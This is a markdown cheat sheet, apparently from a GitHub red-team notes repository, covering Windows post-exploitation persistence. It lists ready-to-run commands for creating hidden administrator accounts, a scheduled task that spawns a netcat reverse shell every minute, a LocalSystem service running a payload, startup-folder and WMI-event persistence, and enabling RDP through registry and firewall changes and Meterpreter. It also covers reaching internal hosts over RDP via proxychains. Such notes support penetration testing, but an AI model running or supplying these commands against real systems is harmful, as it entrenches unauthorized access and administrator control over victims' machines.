Skip to content

Latest commit

 

History

History
62 lines (46 loc) · 2.54 KB

Post Exploitation - Persistence.md

File metadata and controls

62 lines (46 loc) · 2.54 KB

Create User:

Create user (CMD): net user username password /add
Add user to group (CMD): net localgroup Administrators username /add
Add user to group (Powershell): Add-LocalGroupMember -Group Administrators -Member username

Scheduled Tasks:

Local scheduled tast: schtasks /create /sc minute /mo 1 /tn "Reverse shell" /tr 'c:\Users\User\Downloads/nc.exe -e cmd.exe'
Create remote scheduled task: schtasks /create /s "PC-NAME" /tn "My App" /tr "PATH" /sc minute /mo 1 /u Domain\User /p password
Logon Scripts: schtasks /create /sc onlogon /tn "task-name" /tr "File or App PATH" /RU "username"

Create Service:

sc create (service name) binpath= "cmd.exe /k C:\temp\pentestlab.exe" start="auto" obj="LocalSystem"
sc start (service name)

Startup Folder:

Add files/executables/links to user startup folder: C:\Users\username\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\rev.lnk

Abandoned processes:

Try to find processes with procmon.exe what statos is NOT_FOUND.

WMI Event:

Execute uor payload when executing another program or event happen. Can be done with PowerLurk.

Aditional Informaion:

Windows Tasks:

  1. https://pentestlab.blog/2019/11/04/persistence-scheduled-tasks/
  2. https://dmfrsecurity.com/2021/09/07/scheduled-task-persistence/

Windows Registry:

  1. https://pentestlab.blog/2019/10/01/persistence-registry-run-keys/

Services:

  1. https://pentestlab.blog/2019/10/07/persistence-new-service/
  2. https://dmcxblue.gitbook.io/red-team-notes/persistence/new-service

Sturtup Folder:

  1. https://dmcxblue.gitbook.io/red-team-notes/persistence/registry-keys-startup-folder
  2. https://stmxcsr.com/persistence/looking-at-the-startup-directory.html

WMI Event:

  1. https://github.com/Sw4mpf0x/PowerLurk

ENABLE RDP:

POWERSHELL:
Enable-PSRemoting;
Enable-NetFirewallRule -DisplayGroup "Remote Desktop";

CMD:
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f;
netsh advfirewall firewall set rule group="remote desktop" new enable=Yes;

METERPRETER:
run getgui -u username -p password;

ADD NEW USER TO RDP & ADMIN GROUP (POWERSHELL / CMD):

  1. net user username password /add
  2. net localgroup "remote desktop users" /add "domain\username"
  3. net localgroup Administrators domain\username /add

LOGIN TO INTERNAL HOST USING RDP VIA PROXYCHAINS:
proxychains4 xfreerdp /u:DOMAIN\username /p:password /v:host_ip